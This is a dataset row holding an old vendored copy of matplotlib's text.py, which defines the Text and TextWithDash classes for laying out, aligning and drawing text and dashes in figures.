| repo_name (string) | path (string) | copies (class) | size (string) | content (string) | license (class) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) | ratio (float64) | config_test (bool) | has_no_keywords (bool) | few_assignments (bool) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
runt18/nupic
|
external/linux32/lib/python2.6/site-packages/matplotlib/text.py
|
1
|
55450
|
"""
Classes for including text in a figure.
"""
from __future__ import division
import math
import numpy as np
from matplotlib import cbook
from matplotlib import rcParams
import artist
from artist import Artist
from cbook import is_string_like, maxdict
from font_manager import FontProperties
from patches import bbox_artist, YAArrow, FancyBboxPatch, \
FancyArrowPatch, Rectangle
import transforms as mtransforms
from transforms import Affine2D, Bbox
from lines import Line2D
import matplotlib.nxutils as nxutils
def _process_text_args(override, fontdict=None, **kwargs):
"Return an override dict. See :func:`~pyplot.text' docstring for info"
if fontdict is not None:
override.update(fontdict)
override.update(kwargs)
return override
# Extracted from Text's method to serve as a function
def get_rotation(rotation):
"""
Return the text angle as float.
*rotation* may be 'horizontal', 'vertical', or a numeric value in degrees.
"""
if rotation in ('horizontal', None):
angle = 0.
elif rotation == 'vertical':
angle = 90.
else:
angle = float(rotation)
return angle%360
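# Example values (a quick sketch of the mapping implemented above):
#     get_rotation('horizontal')  # -> 0.0
#     get_rotation('vertical')    # -> 90.0
#     get_rotation(450)           # -> 90.0, since angles are reduced modulo 360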
# these are not available for the object inspector until after the
# class is built so we define an initial set here for the init
# function and they will be overridden after object defn
artist.kwdocd['Text'] = """
========================== =========================================================================
Property                   Value
========================== =========================================================================
alpha                      float
animated                   [True | False]
backgroundcolor            any matplotlib color
bbox                       rectangle prop dict plus key 'pad' which is a pad in points
clip_box                   a matplotlib.transform.Bbox instance
clip_on                    [True | False]
color                      any matplotlib color
family                     [ 'serif' | 'sans-serif' | 'cursive' | 'fantasy' | 'monospace' ]
figure                     a matplotlib.figure.Figure instance
fontproperties             a matplotlib.font_manager.FontProperties instance
horizontalalignment or ha  [ 'center' | 'right' | 'left' ]
label                      any string
linespacing                float
lod                        [True | False]
multialignment             ['left' | 'right' | 'center' ]
name or fontname           string eg, ['Sans' | 'Courier' | 'Helvetica' ...]
position                   (x,y)
rotation                   [ angle in degrees | 'vertical' | 'horizontal' ]
size or fontsize           [ size in points | relative size eg 'smaller', 'x-large' ]
style or fontstyle         [ 'normal' | 'italic' | 'oblique']
text                       string
transform                  a matplotlib.transform transformation instance
variant                    [ 'normal' | 'small-caps' ]
verticalalignment or va    [ 'center' | 'top' | 'bottom' | 'baseline' ]
visible                    [True | False]
weight or fontweight       [ 'normal' | 'bold' | 'heavy' | 'light' | 'ultrabold' | 'ultralight']
x                          float
y                          float
zorder                     any number
========================== =========================================================================
"""
# TODO : This function may move into the Text class as a method. As a
# matter of fact, the information from the _get_textbox function
# should be available during the Text._get_layout() call, which is
# called within the _get_textbox. So, it would be better to move this
# function as a method with some refactoring of _get_layout method.
def _get_textbox(text, renderer):
"""
Calculate the bounding box of the text. Unlike the
:meth:`matplotlib.text.Text.get_extents` method, the bbox size of
the text before rotation is calculated.
"""
projected_xs = []
projected_ys = []
theta = text.get_rotation()/180.*math.pi
tr = mtransforms.Affine2D().rotate(-theta)
for t, wh, x, y in text._get_layout(renderer)[1]:
w, h = wh
xt1, yt1 = tr.transform_point((x, y))
xt2, yt2 = xt1+w, yt1+h
projected_xs.extend([xt1, xt2])
projected_ys.extend([yt1, yt2])
xt_box, yt_box = min(projected_xs), min(projected_ys)
w_box, h_box = max(projected_xs) - xt_box, max(projected_ys) - yt_box
tr = mtransforms.Affine2D().rotate(theta)
x_box, y_box = tr.transform_point((xt_box, yt_box))
return x_box, y_box, w_box, h_box
class Text(Artist):
"""
Handle storing and drawing of text in window or data coordinates.
"""
zorder = 3
def __str__(self):
return "Text({0:g},{1:g},{2!s})".format(self._y, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='bottom',
horizontalalignment='left',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
**kwargs
):
"""
Create a :class:`~matplotlib.text.Text` instance at *x*, *y*
with string *text*.
Valid kwargs are
%(Text)s
"""
Artist.__init__(self)
self.cached = maxdict(5)
self._x, self._y = x, y
if color is None: color = rcParams['text.color']
if fontproperties is None: fontproperties=FontProperties()
elif is_string_like(fontproperties): fontproperties=FontProperties(fontproperties)
self.set_text(text)
self.set_color(color)
self._verticalalignment = verticalalignment
self._horizontalalignment = horizontalalignment
self._multialignment = multialignment
self._rotation = rotation
self._fontproperties = fontproperties
self._bbox = None
self._bbox_patch = None # a FancyBboxPatch instance
self._renderer = None
if linespacing is None:
linespacing = 1.2 # Maybe use rcParam later.
self._linespacing = linespacing
self.update(kwargs)
#self.set_bbox(dict(pad=0))
def contains(self,mouseevent):
"""Test whether the mouse event occurred in the patch.
In the case of text, a hit is true anywhere in the
axis-aligned bounding-box containing the text.
Returns True or False.
"""
if callable(self._contains): return self._contains(self,mouseevent)
if not self.get_visible() or self._renderer is None:
return False,{}
l,b,w,h = self.get_window_extent().bounds
r = l+w
t = b+h
xyverts = (l,b), (l, t), (r, t), (r, b)
x, y = mouseevent.x, mouseevent.y
inside = nxutils.pnpoly(x, y, xyverts)
return inside,{}
def _get_xy_display(self):
'get the (possibly unit converted) transformed x, y in display coords'
x, y = self.get_position()
return self.get_transform().transform_point((x,y))
def _get_multialignment(self):
if self._multialignment is not None: return self._multialignment
else: return self._horizontalalignment
def get_rotation(self):
'return the text angle as float in degrees'
return get_rotation(self._rotation) # string_or_number -> number
def update_from(self, other):
'Copy properties from other to self'
Artist.update_from(self, other)
self._color = other._color
self._multialignment = other._multialignment
self._verticalalignment = other._verticalalignment
self._horizontalalignment = other._horizontalalignment
self._fontproperties = other._fontproperties.copy()
self._rotation = other._rotation
self._picker = other._picker
self._linespacing = other._linespacing
def _get_layout(self, renderer):
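# Returns (bbox, [(line, (w, h), x, y), ...]): the overall extent of the
# text plus per-line layout offsets, cached under the get_prop_tup() key.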
key = self.get_prop_tup()
if key in self.cached: return self.cached[key]
horizLayout = []
thisx, thisy = 0.0, 0.0
xmin, ymin = 0.0, 0.0
width, height = 0.0, 0.0
lines = self._text.split('\n')
whs = np.zeros((len(lines), 2))
horizLayout = np.zeros((len(lines), 4))
# Find full vertical extent of font,
# including ascenders and descenders:
tmp, heightt, bl = renderer.get_text_width_height_descent(
'lp', self._fontproperties, ismath=False)
offsety = heightt * self._linespacing
baseline = None
for i, line in enumerate(lines):
clean_line, ismath = self.is_math_text(line)
w, h, d = renderer.get_text_width_height_descent(
clean_line, self._fontproperties, ismath=ismath)
if baseline is None:
baseline = h - d
whs[i] = w, h
horizLayout[i] = thisx, thisy, w, h
thisy -= offsety
width = max(width, w)
ymin = horizLayout[-1][1]
ymax = horizLayout[0][1] + horizLayout[0][3]
height = ymax-ymin
xmax = xmin + width
# get the rotation matrix
M = Affine2D().rotate_deg(self.get_rotation())
offsetLayout = np.zeros((len(lines), 2))
offsetLayout[:] = horizLayout[:, 0:2]
# now offset the individual text lines within the box
if len(lines)>1: # do the multiline alignment
malign = self._get_multialignment()
if malign == 'center':
offsetLayout[:, 0] += width/2.0 - horizLayout[:, 2] / 2.0
elif malign == 'right':
offsetLayout[:, 0] += width - horizLayout[:, 2]
# the corners of the unrotated bounding box
cornersHoriz = np.array(
[(xmin, ymin), (xmin, ymax), (xmax, ymax), (xmax, ymin)],
np.float_)
# now rotate the bbox
cornersRotated = M.transform(cornersHoriz)
txs = cornersRotated[:, 0]
tys = cornersRotated[:, 1]
# compute the bounds of the rotated box
xmin, xmax = txs.min(), txs.max()
ymin, ymax = tys.min(), tys.max()
width = xmax - xmin
height = ymax - ymin
# Now move the box to the target position, offsetting the display bbox by the alignment
halign = self._horizontalalignment
valign = self._verticalalignment
# compute the text location in display coords and the offsets
# necessary to align the bbox with that location
if halign=='center': offsetx = (xmin + width/2.0)
elif halign=='right': offsetx = (xmin + width)
else: offsetx = xmin
if valign=='center': offsety = (ymin + height/2.0)
elif valign=='top': offsety = (ymin + height)
elif valign=='baseline': offsety = (ymin + height) - baseline
else: offsety = ymin
xmin -= offsetx
ymin -= offsety
bbox = Bbox.from_bounds(xmin, ymin, width, height)
# now rotate the positions around the first x,y position
xys = M.transform(offsetLayout)
xys -= (offsetx, offsety)
xs, ys = xys[:, 0], xys[:, 1]
ret = bbox, zip(lines, whs, xs, ys)
self.cached[key] = ret
return ret
def set_bbox(self, rectprops):
"""
Draw a bounding box around self. rectprops are any settable
properties for a rectangle, eg facecolor='red', alpha=0.5.
t.set_bbox(dict(facecolor='red', alpha=0.5))
If rectprops has a "boxstyle" key, a FancyBboxPatch
is initialized with rectprops and will be drawn. The mutation
scale of the FancyBboxPatch is set to the fontsize.
ACCEPTS: rectangle prop dict
"""
# The self._bbox_patch object is created only if rectprops has
# boxstyle key. Otherwise, self._bbox will be set to the
# rectprops and the bbox will be drawn using bbox_artist
# function. This is to keep the backward compatibility.
if rectprops is not None and "boxstyle" in rectprops:
props = rectprops.copy()
boxstyle = props.pop("boxstyle")
bbox_transmuter = props.pop("bbox_transmuter", None)
self._bbox_patch = FancyBboxPatch((0., 0.),
1., 1.,
boxstyle=boxstyle,
bbox_transmuter=bbox_transmuter,
transform=mtransforms.IdentityTransform(),
**props)
self._bbox = None
else:
self._bbox_patch = None
self._bbox = rectprops
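# A minimal usage sketch (assumes ``t`` is an existing Text instance): a
# plain prop dict is drawn with bbox_artist, while adding a "boxstyle" key
# switches to a FancyBboxPatch:
#     t.set_bbox(dict(facecolor='red', alpha=0.5))
#     t.set_bbox(dict(boxstyle='round', facecolor='wheat', alpha=0.5))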
def get_bbox_patch(self):
"""
Return the bbox Patch object. Returns None if the
FancyBboxPatch is not made.
"""
return self._bbox_patch
def update_bbox_position_size(self, renderer):
"""
Update the location and the size of the bbox. This method
should be used when the position and size of the bbox needs to
be updated before actually drawing the bbox.
"""
# For arrow_patch, use textbox as patchA by default.
if not isinstance(self.arrow_patch, FancyArrowPatch):
return
if self._bbox_patch:
trans = self.get_transform()
# don't use self.get_position here, which refers to text position
# in Text, and dash position in TextWithDash:
posx = float(self.convert_xunits(self._x))
posy = float(self.convert_yunits(self._y))
posx, posy = trans.transform_point((posx, posy))
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0.,
w_box, h_box)
theta = self.get_rotation()/180.*math.pi
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx+x_box, posy+y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
#self._bbox_patch.draw(renderer)
else:
props = self._bbox
if props is None: props = {}
props = props.copy() # don't want to alter the pad externally
pad = props.pop('pad', 4)
pad = renderer.points_to_pixels(pad)
bbox = self.get_window_extent(renderer)
l,b,w,h = bbox.bounds
l-=pad/2.
b-=pad/2.
w+=pad
h+=pad
r = Rectangle(xy=(l,b),
width=w,
height=h,
)
r.set_transform(mtransforms.IdentityTransform())
r.set_clip_on( False )
r.update(props)
self.arrow_patch.set_patchA(r)
def _draw_bbox(self, renderer, posx, posy):
""" Update the location and the size of the bbox
(FancyBboxPatch), and draw it.
"""
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0.,
w_box, h_box)
theta = self.get_rotation()/180.*math.pi
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx+x_box, posy+y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
self._bbox_patch.draw(renderer)
def draw(self, renderer):
"""
Draws the :class:`Text` object to the given *renderer*.
"""
if renderer is not None:
self._renderer = renderer
if not self.get_visible(): return
if self._text=='': return
bbox, info = self._get_layout(renderer)
trans = self.get_transform()
# don't use self.get_position here, which refers to text position
# in Text, and dash position in TextWithDash:
posx = float(self.convert_xunits(self._x))
posy = float(self.convert_yunits(self._y))
posx, posy = trans.transform_point((posx, posy))
canvasw, canvash = renderer.get_canvas_width_height()
# draw the FancyBboxPatch
if self._bbox_patch:
self._draw_bbox(renderer, posx, posy)
gc = renderer.new_gc()
gc.set_foreground(self._color)
gc.set_alpha(self._alpha)
gc.set_url(self._url)
if self.get_clip_on():
gc.set_clip_rectangle(self.clipbox)
if self._bbox:
bbox_artist(self, renderer, self._bbox)
angle = self.get_rotation()
if rcParams['text.usetex']:
for line, wh, x, y in info:
x = x + posx
y = y + posy
if renderer.flipy():
y = canvash-y
clean_line, ismath = self.is_math_text(line)
renderer.draw_tex(gc, x, y, clean_line,
self._fontproperties, angle)
return
for line, wh, x, y in info:
x = x + posx
y = y + posy
if renderer.flipy():
y = canvash-y
clean_line, ismath = self.is_math_text(line)
renderer.draw_text(gc, x, y, clean_line,
self._fontproperties, angle,
ismath=ismath)
def get_color(self):
"Return the color of the text"
return self._color
def get_fontproperties(self):
"Return the :class:`~font_manager.FontProperties` object"
return self._fontproperties
def get_font_properties(self):
'alias for get_fontproperties'
return self.get_fontproperties()
def get_family(self):
"Return the list of font families used for font lookup"
return self._fontproperties.get_family()
def get_fontfamily(self):
'alias for get_family'
return self.get_family()
def get_name(self):
"Return the font name as string"
return self._fontproperties.get_name()
def get_style(self):
"Return the font style as string"
return self._fontproperties.get_style()
def get_size(self):
"Return the font size as integer"
return self._fontproperties.get_size_in_points()
def get_variant(self):
"Return the font variant as a string"
return self._fontproperties.get_variant()
def get_fontvariant(self):
'alias for get_variant'
return self.get_variant()
def get_weight(self):
"Get the font weight as string or number"
return self._fontproperties.get_weight()
def get_fontname(self):
'alias for get_name'
return self.get_name()
def get_fontstyle(self):
'alias for get_style'
return self.get_style()
def get_fontsize(self):
'alias for get_size'
return self.get_size()
def get_fontweight(self):
'alias for get_weight'
return self.get_weight()
def get_stretch(self):
'Get the font stretch as a string or number'
return self._fontproperties.get_stretch()
def get_fontstretch(self):
'alias for get_stretch'
return self.get_stretch()
def get_ha(self):
'alias for get_horizontalalignment'
return self.get_horizontalalignment()
def get_horizontalalignment(self):
"""
Return the horizontal alignment as string. Will be one of
'left', 'center' or 'right'.
"""
return self._horizontalalignment
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
x = float(self.convert_xunits(self._x))
y = float(self.convert_yunits(self._y))
return x, y
def get_prop_tup(self):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (eg layouts) and
need to know if the text has changed.
"""
x, y = self.get_position()
return (x, y, self._text, self._color,
self._verticalalignment, self._horizontalalignment,
hash(self._fontproperties), self._rotation,
self.figure.dpi, id(self._renderer),
)
def get_text(self):
"Get the text as string"
return self._text
def get_va(self):
'alias for :meth:`get_verticalalignment`'
return self.get_verticalalignment()
def get_verticalalignment(self):
"""
Return the vertical alignment as string. Will be one of
'top', 'center', 'bottom' or 'baseline'.
"""
return self._verticalalignment
def get_window_extent(self, renderer=None, dpi=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
*dpi* defaults to self.figure.dpi; the renderer dpi is
irrelevant. For the web application, if figure.dpi is not
the value used when saving the figure, then the value that
was used must be specified as the *dpi* argument.
'''
#return _unit_box
if not self.get_visible(): return Bbox.unit()
if dpi is not None:
dpi_orig = self.figure.dpi
self.figure.dpi = dpi
if self._text == '':
tx, ty = self._get_xy_display()
return Bbox.from_bounds(tx,ty,0,0)
if renderer is not None:
self._renderer = renderer
if self._renderer is None:
raise RuntimeError('Cannot get window extent w/o renderer')
bbox, info = self._get_layout(self._renderer)
x, y = self.get_position()
x, y = self.get_transform().transform_point((x, y))
bbox = bbox.translated(x, y)
if dpi is not None:
self.figure.dpi = dpi_orig
return bbox
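# A minimal usage sketch (assumes the Agg backend, whose canvas provides
# get_renderer(), and existing ``fig``/``t`` objects): to query the extent
# before the first draw, pass the renderer explicitly:
#     renderer = fig.canvas.get_renderer()
#     bbox = t.get_window_extent(renderer=renderer)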
def set_backgroundcolor(self, color):
"""
Set the background color of the text by updating the bbox.
.. seealso::
:meth:`set_bbox`
ACCEPTS: any matplotlib color
"""
if self._bbox is None:
self._bbox = dict(facecolor=color, edgecolor=color)
else:
self._bbox.update(dict(facecolor=color))
def set_color(self, color):
"""
Set the foreground color of the text
ACCEPTS: any matplotlib color
"""
# Make sure it is hashable, or get_prop_tup will fail.
try:
hash(color)
except TypeError:
color = tuple(color)
self._color = color
def set_ha(self, align):
'alias for set_horizontalalignment'
self.set_horizontalalignment(align)
def set_horizontalalignment(self, align):
"""
Set the horizontal alignment to one of
ACCEPTS: [ 'center' | 'right' | 'left' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of {0!s}'.format(str(legal)))
self._horizontalalignment = align
def set_ma(self, align):
'alias for set_multialignment'
self.set_multialignment(align)
def set_multialignment(self, align):
"""
Set the alignment for multiple lines layout. The layout of the
bounding box of all the lines is determined by the horizontalalignment
and verticalalignment properties, but the multiline text within that
box can be aligned independently of the box itself.
ACCEPTS: ['left' | 'right' | 'center' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Multialignment must be one of {0!s}'.format(str(legal)))
self._multialignment = align
def set_linespacing(self, spacing):
"""
Set the line spacing as a multiple of the font size.
Default is 1.2.
ACCEPTS: float (multiple of font size)
"""
self._linespacing = spacing
def set_family(self, fontname):
"""
Set the font family. May be either a single string, or a list
of strings in decreasing priority. Each string may be either
a real font name or a generic font class name. If the latter,
the specific font names will be looked up in the
:file:`matplotlibrc` file.
ACCEPTS: [ FONTNAME | 'serif' | 'sans-serif' | 'cursive' | 'fantasy' | 'monospace' ]
"""
self._fontproperties.set_family(fontname)
def set_variant(self, variant):
"""
Set the font variant, either 'normal' or 'small-caps'.
ACCEPTS: [ 'normal' | 'small-caps' ]
"""
self._fontproperties.set_variant(variant)
def set_fontvariant(self, variant):
'alias for set_variant'
return self.set_variant(variant)
def set_name(self, fontname):
"""alias for set_family"""
return self.set_family(fontname)
def set_fontname(self, fontname):
"""alias for set_family"""
self.set_family(fontname)
def set_style(self, fontstyle):
"""
Set the font style.
ACCEPTS: [ 'normal' | 'italic' | 'oblique']
"""
self._fontproperties.set_style(fontstyle)
def set_fontstyle(self, fontstyle):
'alias for set_style'
return self.set_style(fontstyle)
def set_size(self, fontsize):
"""
Set the font size. May be either a size string, relative to
the default font size, or an absolute font size in points.
ACCEPTS: [ size in points | 'xx-small' | 'x-small' | 'small' | 'medium' | 'large' | 'x-large' | 'xx-large' ]
"""
self._fontproperties.set_size(fontsize)
def set_fontsize(self, fontsize):
'alias for set_size'
return self.set_size(fontsize)
def set_weight(self, weight):
"""
Set the font weight.
ACCEPTS: [ a numeric value in range 0-1000 | 'ultralight' | 'light' | 'normal' | 'regular' | 'book' | 'medium' | 'roman' | 'semibold' | 'demibold' | 'demi' | 'bold' | 'heavy' | 'extra bold' | 'black' ]
"""
self._fontproperties.set_weight(weight)
def set_fontweight(self, weight):
'alias for set_weight'
return self.set_weight(weight)
def set_stretch(self, stretch):
"""
Set the font stretch (horizontal condensation or expansion).
ACCEPTS: [ a numeric value in range 0-1000 | 'ultra-condensed' | 'extra-condensed' | 'condensed' | 'semi-condensed' | 'normal' | 'semi-expanded' | 'expanded' | 'extra-expanded' | 'ultra-expanded' ]
"""
self._fontproperties.set_stretch(stretch)
def set_fontstretch(self, stretch):
'alias for set_stretch'
return self.set_stretch(stretch)
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the text
ACCEPTS: (x,y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the text
ACCEPTS: float
"""
self._x = x
def set_y(self, y):
"""
Set the *y* position of the text
ACCEPTS: float
"""
self._y = y
def set_rotation(self, s):
"""
Set the rotation of the text
ACCEPTS: [ angle in degrees | 'vertical' | 'horizontal' ]
"""
self._rotation = s
def set_va(self, align):
'alias for set_verticalalignment'
self.set_verticalalignment(align)
def set_verticalalignment(self, align):
"""
Set the vertical alignment
ACCEPTS: [ 'center' | 'top' | 'bottom' | 'baseline' ]
"""
legal = ('top', 'bottom', 'center', 'baseline')
if align not in legal:
raise ValueError('Vertical alignment must be one of {0!s}'.format(str(legal)))
self._verticalalignment = align
def set_text(self, s):
"""
Set the text string *s*
It may contain newlines (``\\n``) or math in LaTeX syntax.
ACCEPTS: string or anything printable with '%s' conversion.
"""
self._text = '{0!s}'.format(s)
def is_math_text(self, s):
"""
Returns the processed string and a flag indicating whether it should be
rendered as mathtext (True, False, or 'TeX' when usetex is on).
"""
# Did we find an even number of non-escaped dollar signs?
# If so, treat it as math text.
dollar_count = s.count(r'$') - s.count(r'\$')
even_dollars = (dollar_count > 0 and dollar_count % 2 == 0)
if rcParams['text.usetex']:
return s, 'TeX'
if even_dollars:
return s, True
else:
return s.replace(r'\$', '$'), False
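# Example behaviour (assuming text.usetex is False and ``t`` is a Text
# instance): an even, non-zero count of unescaped dollars marks mathtext,
# otherwise escaped dollars are unescaped and the string is plain text:
#     t.is_math_text(r'$x^2$')      # -> ('$x^2$', True)
#     t.is_math_text(r'cost: \$5')  # -> ('cost: $5', False)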
def set_fontproperties(self, fp):
"""
Set the font properties that control the text. *fp* must be a
:class:`matplotlib.font_manager.FontProperties` object.
ACCEPTS: a :class:`matplotlib.font_manager.FontProperties` instance
"""
if is_string_like(fp):
fp = FontProperties(fp)
self._fontproperties = fp.copy()
def set_font_properties(self, fp):
'alias for set_fontproperties'
self.set_fontproperties(fp)
artist.kwdocd['Text'] = artist.kwdoc(Text)
Text.__init__.im_func.__doc__ = cbook.dedent(Text.__init__.__doc__) % artist.kwdocd
class TextWithDash(Text):
"""
This is basically a :class:`~matplotlib.text.Text` with a dash
(drawn with a :class:`~matplotlib.lines.Line2D`) before/after
it. It is intended to be a drop-in replacement for
:class:`~matplotlib.text.Text`, and should behave identically to
it when *dashlength* = 0.0.
The dash always comes between the point specified by
:meth:`~matplotlib.text.Text.set_position` and the text. When a
dash exists, the text alignment arguments (*horizontalalignment*,
*verticalalignment*) are ignored.
*dashlength* is the length of the dash in canvas units.
(default = 0.0).
*dashdirection* is one of 0 or 1, where 0 draws the dash after the
text and 1 before. (default = 0).
*dashrotation* specifies the rotation of the dash, and should
generally stay *None*. In this case
:meth:`~matplotlib.text.TextWithDash.get_dashrotation` returns
:meth:`~matplotlib.text.Text.get_rotation`. (I.e., the dash takes
its rotation from the text's rotation). Because the text center is
projected onto the dash, major deviations in the rotation cause
what may be considered visually unappealing results.
(default = *None*)
*dashpad* is a padding length to add (or subtract) space
between the text and the dash, in canvas units.
(default = 3)
*dashpush* "pushes" the dash and text away from the point
specified by :meth:`~matplotlib.text.Text.set_position` by the
amount in canvas units. (default = 0)
.. note::
The alignment of the two objects is based on the bounding box
of the :class:`~matplotlib.text.Text`, as obtained by
:meth:`~matplotlib.artist.Artist.get_window_extent`. This, in
turn, appears to depend on the font metrics as given by the
rendering backend. Hence the quality of the "centering" of the
label text with respect to the dash varies depending on the
backend used.
.. note::
I'm not sure that I got the
:meth:`~matplotlib.text.TextWithDash.get_window_extent` right,
or whether that's sufficient for providing the object bounding
box.
"""
__name__ = 'textwithdash'
def __str__(self):
return "TextWithDash({0:g},{1:g},{2!s})".format(self._x, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='center',
horizontalalignment='center',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
dashlength=0.0,
dashdirection=0,
dashrotation=None,
dashpad=3,
dashpush=0,
):
Text.__init__(self, x=x, y=y, text=text, color=color,
verticalalignment=verticalalignment,
horizontalalignment=horizontalalignment,
multialignment=multialignment,
fontproperties=fontproperties,
rotation=rotation,
linespacing=linespacing)
# The position (x,y) values for text and dashline
# are bogus as given in the instantiation; they will
# be set correctly by update_coords() in draw()
self.dashline = Line2D(xdata=(x, x),
ydata=(y, y),
color='k',
linestyle='-')
self._dashx = float(x)
self._dashy = float(y)
self._dashlength = dashlength
self._dashdirection = dashdirection
self._dashrotation = dashrotation
self._dashpad = dashpad
self._dashpush = dashpush
#self.set_bbox(dict(pad=0))
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
x = float(self.convert_xunits(self._dashx))
y = float(self.convert_yunits(self._dashy))
return x, y
def get_prop_tup(self):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (eg layouts) and
need to know if the text has changed.
"""
props = [p for p in Text.get_prop_tup(self)]
props.extend([self._x, self._y, self._dashlength, self._dashdirection, self._dashrotation, self._dashpad, self._dashpush])
return tuple(props)
def draw(self, renderer):
"""
Draw the :class:`TextWithDash` object to the given *renderer*.
"""
self.update_coords(renderer)
Text.draw(self, renderer)
if self.get_dashlength() > 0.0:
self.dashline.draw(renderer)
def update_coords(self, renderer):
"""
Computes the actual *x*, *y* coordinates for text based on the
input *x*, *y* and the *dashlength*. Since the rotation is
with respect to the actual canvas's coordinates we need to map
back and forth.
"""
dashx, dashy = self.get_position()
dashlength = self.get_dashlength()
# Shortcircuit this process if we don't have a dash
if dashlength == 0.0:
self._x, self._y = dashx, dashy
return
dashrotation = self.get_dashrotation()
dashdirection = self.get_dashdirection()
dashpad = self.get_dashpad()
dashpush = self.get_dashpush()
angle = get_rotation(dashrotation)
theta = np.pi*(angle/180.0+dashdirection-1)
cos_theta, sin_theta = np.cos(theta), np.sin(theta)
transform = self.get_transform()
# Compute the dash end points
# The 'c' prefix is for canvas coordinates
cxy = transform.transform_point((dashx, dashy))
cd = np.array([cos_theta, sin_theta])
c1 = cxy+dashpush*cd
c2 = cxy+(dashpush+dashlength)*cd
inverse = transform.inverted()
(x1, y1) = inverse.transform_point(tuple(c1))
(x2, y2) = inverse.transform_point(tuple(c2))
self.dashline.set_data((x1, x2), (y1, y2))
# We now need to extend this vector out to
# the center of the text area.
# The basic problem here is that we're "rotating"
# two separate objects but want it to appear as
# if they're rotated together.
# This is made non-trivial because of the
# interaction between text rotation and alignment -
# text alignment is based on the bbox after rotation.
# We reset/force both alignments to 'center'
# so we can do something relatively reasonable.
# There's probably a better way to do this by
# embedding all this in the object's transformations,
# but I don't grok the transformation stuff
# well enough yet.
we = Text.get_window_extent(self, renderer=renderer)
w, h = we.width, we.height
# Watch for zeros
if sin_theta == 0.0:
dx = w
dy = 0.0
elif cos_theta == 0.0:
dx = 0.0
dy = h
else:
tan_theta = sin_theta/cos_theta
dx = w
dy = w*tan_theta
if dy > h or dy < -h:
dy = h
dx = h/tan_theta
cwd = np.array([dx, dy])/2
cwd *= 1+dashpad/np.sqrt(np.dot(cwd,cwd))
cw = c2+(dashdirection*2-1)*cwd
newx, newy = inverse.transform_point(tuple(cw))
self._x, self._y = newx, newy
# Now set the window extent
# I'm not at all sure this is the right way to do this.
we = Text.get_window_extent(self, renderer=renderer)
self._twd_window_extent = we.frozen()
self._twd_window_extent.update_from_data_xy(np.array([c1]), False)
# Finally, make text align center
Text.set_horizontalalignment(self, 'center')
Text.set_verticalalignment(self, 'center')
def get_window_extent(self, renderer=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
'''
self.update_coords(renderer)
if self.get_dashlength() == 0.0:
return Text.get_window_extent(self, renderer=renderer)
else:
return self._twd_window_extent
def get_dashlength(self):
"""
Get the length of the dash.
"""
return self._dashlength
def set_dashlength(self, dl):
"""
Set the length of the dash.
ACCEPTS: float (canvas units)
"""
self._dashlength = dl
def get_dashdirection(self):
"""
Get the dash direction. 1 is before the text and 0 is after.
"""
return self._dashdirection
def set_dashdirection(self, dd):
"""
Set the direction of the dash following the text.
1 is before the text and 0 is after. The default
is 0, which is what you'd want for the typical
case of ticks below and on the left of the figure.
ACCEPTS: int (1 is before, 0 is after)
"""
self._dashdirection = dd
def get_dashrotation(self):
"""
Get the rotation of the dash in degrees.
"""
if self._dashrotation is None:
return self.get_rotation()
else:
return self._dashrotation
def set_dashrotation(self, dr):
"""
Set the rotation of the dash, in degrees
ACCEPTS: float (degrees)
"""
self._dashrotation = dr
def get_dashpad(self):
"""
Get the extra spacing between the dash and the text, in canvas units.
"""
return self._dashpad
def set_dashpad(self, dp):
"""
Set the "pad" of the TextWithDash, which is the extra spacing
between the dash and the text, in canvas units.
ACCEPTS: float (canvas units)
"""
self._dashpad = dp
def get_dashpush(self):
"""
Get the extra spacing between the dash and the specified text
position, in canvas units.
"""
return self._dashpush
def set_dashpush(self, dp):
"""
Set the "push" of the TextWithDash, which
is the extra spacing between the beginning
of the dash and the specified position.
ACCEPTS: float (canvas units)
"""
self._dashpush = dp
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the :class:`TextWithDash`.
ACCEPTS: (x, y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the :class:`TextWithDash`.
ACCEPTS: float
"""
self._dashx = float(x)
def set_y(self, y):
"""
Set the *y* position of the :class:`TextWithDash`.
ACCEPTS: float
"""
self._dashy = float(y)
